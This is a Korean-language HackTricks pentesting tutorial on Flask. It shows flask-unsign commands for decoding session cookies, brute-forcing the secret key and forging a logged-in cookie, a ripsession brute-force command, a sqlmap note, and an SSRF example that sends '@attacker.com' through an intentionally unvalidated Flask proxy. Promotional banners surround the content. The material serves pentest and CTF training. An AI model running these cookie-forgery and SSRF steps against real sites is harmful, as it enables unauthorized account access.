hacktricks/network-services-pentesting/pentesting-web/flask.md

플라스크

htARTE (HackTricks AWS Red Team Expert)를 통해 제로에서 히어로까지 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team Expert)!

HackTricks를 지원하는 다른 방법:

• 회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하고 싶다면 SUBSCRIPTION PLANS를 확인하세요!
• 공식 PEASS & HackTricks 스왜그를 구매하세요
• The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
• **💬 Discord 그룹이나 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm를 팔로우하세요.
• 해킹 트릭을 공유하려면 PR을 HackTricks 및 HackTricks Cloud 깃허브 저장소에 제출하세요.

Trickest를 사용하여 세계에서 가장 고급 커뮤니티 도구로 구동되는 워크플로우를 쉽게 구축하고 자동화하세요.
오늘 바로 액세스하세요:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}

아마도 CTF를 진행 중이라면 Flask 애플리케이션은 SSTI과 관렸이 있을 것입니다.

쿠키

기본 쿠키 세션 이름은 **session**입니다.

디코더

온라인 Flask 쿠키 디코더: https://www.kirsle.net/wizards/flask-session.cgi

수동

쿠키의 첫 번째 부분을 첫 번째 점까지 가져와서 Base64로 디코딩하세요.

echo "ImhlbGxvIg" | base64 -d

쿠키는 비밀번호를 사용하여 서명됩니다

Flask-Unsign

Flask 애플리케이션의 세션 쿠키를 추측하여 비밀 키를 맞추어 가져오고 해독하고 브루트 포스 및 작성하는 명령 줄 도구.

{% embed url="https://pypi.org/project/flask-unsign/" %}

pip3 install flask-unsign

쿠키 디코딩

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

무차별 대입

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

서명

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

레거시(이전 버전) 사용하여 서명하기

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

플라스크-unsign으로 제작된 쿠키를 사용하여 웹사이트를 브루트 포스하는 명령줄 도구입니다.

{% embed url="https://github.com/Tagvi/ripsession" %}

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

SQLi in Flask session cookie with SQLmap

이 예제는 알려진 시크릿을 사용하여 Flask에 대한 sqlmap 페이로드를 자동으로 서명하는 데 sqlmap eval 옵션을 사용합니다.

Flask Proxy to SSRF

이 설명서에서 Flask가 "@" 문자로 시작하는 요청을 허용하는 방법에 대해 설명되어 있습니다.

GET @/ HTTP/1.1
Host: target.com
Connection: close

다음 시나리오에서:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

"@attacker.com"과 같은 것을 소개할 수 있도록 허용하여 SSRF를 유발할 수 있습니다.

Trickest을 사용하여 세계에서 가장 고급 커뮤니티 도구로 구동되는 워크플로우를 쉽게 구축 및 자동화하세요.
오늘 액세스하세요:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}

htARTE (HackTricks AWS Red Team Expert)로부터 제로에서 영웅까지 AWS 해킹 배우기

HackTricks를 지원하는 다른 방법:

• 회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하길 원한다면 SUBSCRIPTION PLANS를 확인하세요!
• 공식 PEASS & HackTricks 스왜그를 얻으세요
• The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
• 💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나Twitter** 🐦 @carlospolopm를 팔로우하세요.
• HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.